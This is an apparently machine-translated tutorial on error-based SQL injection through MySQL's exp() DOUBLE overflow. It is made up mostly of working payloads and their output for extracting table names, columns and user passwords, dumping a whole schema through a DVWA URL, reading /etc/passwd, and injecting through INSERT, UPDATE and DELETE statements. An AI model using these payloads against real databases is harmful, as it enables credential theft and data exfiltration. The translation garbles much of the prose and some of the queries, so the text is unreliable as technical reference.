0x01 Preface Overview
Good news ~ The author also MySQL
found a Double
type of data overflow in. If you want to understand the use of overflow to note the data, you can read the author's previous blog post: BIGINT Overflow Error based injections,drops above also has a corresponding translation, see here. When we get MySQL
the function in, the author is more interested in the mathematical functions, they should also contain some data types to hold the value. So the author ran to the test to see which functions would have overflow errors. The author then discovers that when a value greater than 709 is passed, 函数exp()
an overflow error is raised.
Mysql> Select exp (709); +-----------------------+| EXP (709) |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 row in Set (0.00 sec) MySQL > select exp (710); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (710) '
In MySQL
, exp
contrary to ln
log
the function of and, simply introduced, is log
and both return the logarithm of the ln
base e, see equation:
Mysql> Select log, +------------------+| Log (|+) ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec) mysql> Select ln (15) ;+------------------+| ln (|+) ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec)
An exponential function is an inverse function of a logarithmic function, which is a exp()
logarithmic function with the base e, such as an equation:
Mysql> Select exp (2.70805020110221); +-----------------------+| Exp (2.70805020110221) |+-----------------------+| |+-----------------------+1 Row in Set (0.00 sec)
0x02 Injection
When it comes to injection, we use a negative query to cause " DOUBLE value is out of range
" errors. As mentioned by the author's previous blog post, the 0 bitwise inverse will return " 18446744073709551615
", plus the reason that the function returns 0 after successful execution, we will get the maximum unsigned value for the successfully executed function BIGINT
.
Mysql> Select ~0;+----------------------+| ~0 |+----------------------+| 18446744073709551615 |+----------------------+1 row in Set (0.00 sec) mysql> Select ~ (select version ()); +----------------------+| ~ (select version ()) |+----------------------+| 18446744073709551610 |+----------------------+1 row in set, 1 Warning (0.00 sec)
We use subqueries and bitwise negation, resulting DOUBLE overflow error
in one, and thereby injecting data.
> ' exp (~ (Select*from (select User ()) x) ' mysql> Select exp (~ (Select*from (select User ()) x)); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X03 Note out data
Get Table name:
Select exp (~ (SELECT*FROM (select table_name from information_schema.tables where table_schema=database () limit 0,1) x));
Get Column Name:
Select exp (~ (Select*from (select column_name from Information_schema.columns where table_name= ' users ' limit 0,1) x));
Retrieving data:
Select exp (~ (Select*from (': ', ID, username, password) from the users limit 0,1) x));
0x04 overnight
This query can dump all tables and columns from the current context. We can also dump out all of the databases, but since we are extracting them through an error, it will return very few results.
Exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) from ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)), @))) http://localhost/ Dvwa/vulnerabilities/sqli/?id=1 ' or exp (~ (Select*from (select (Concat (@:=0) (SELECT COUNT (*) from ' information_schema ' . columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a, column_name))))---&submit=submit#
0x04 Read File
You can load_file()
read the file through a function, but the author finds that there are 13 lines of restrictions that the statement can also BIGINT overflow injections
use in.
Select exp (~ (Select*from (select Load_file ('/etc/passwd ')));
Note that you cannot write the file because this error is written only in 0.
Mysql> Select exp (~ (select*from (select ' Hello ') a)) into outfile ' c:/out.txt '; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((SELECT ' Hello ' from dual)) ' # type C:\out.txt0
0x05 Injection in Insert
Just step by step.
mysql> INSERT into users (ID, username, password) VALUES (2, ' ^ exp (~ (Select*from (select User ()) x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
The insert,update
delete
DIOS
same can be used for all and statement queries.
mysql> INSERT into users (ID, username, password) VALUES (2, ' | exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) From ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a (Table_name,0x3a3a,column_name)) (@)))) (x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (~ ((SELECT ' 000newdb::users::idnewdb::users::usernamenewdb::users ::p Assword ' from dual)) '
0x06 Injection in Update
Mysql> Update users set password= ' Peter ' ^ exp (~ (Select*from (select User ()) x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0x07 Injection in Delete
Mysql> Delete from users where id= ' 1 ' | Exp (~ (Select*from (select User ()) x)); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X08 Summary
As with the previous bigint injection, exp injection is also available for MySQL5.5.5 and above versions. The previous version was "silent" for this situation.
Mysql> select version (); +---------------------+| Version () |+---------------------+| 5.0.45-community-nt |+---------------------+1 row in Set (0.00 sec) mysql> Select exp (710); +----------+| EXP (710) |+----------+| 1. #INF |+----------+1 row in Set (0.00 sec) mysql> Select exp (~0); +---------+| Exp (~0) |+---------+| 1. #INF |+---------+1 row in Set (0.00 sec)
Using EXP for SQL error injection